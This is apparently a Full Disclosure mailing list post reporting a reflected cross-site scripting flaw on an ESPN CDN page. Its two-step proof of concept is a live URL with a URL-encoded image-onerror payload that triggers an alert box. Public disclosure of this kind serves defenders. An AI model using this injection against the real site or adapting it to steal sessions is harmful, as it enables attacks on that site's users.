Document Title: =============== Reflected XSS on ESPN site
PoC: =============== 1) Navigate to the following URL: http://cdn.espn.com/core/standalone/webview?partial=%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E%2F%2F&appsrc=sc&lang=en®ion=us&platform=ios 2) Note that the form alerts with the payload _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
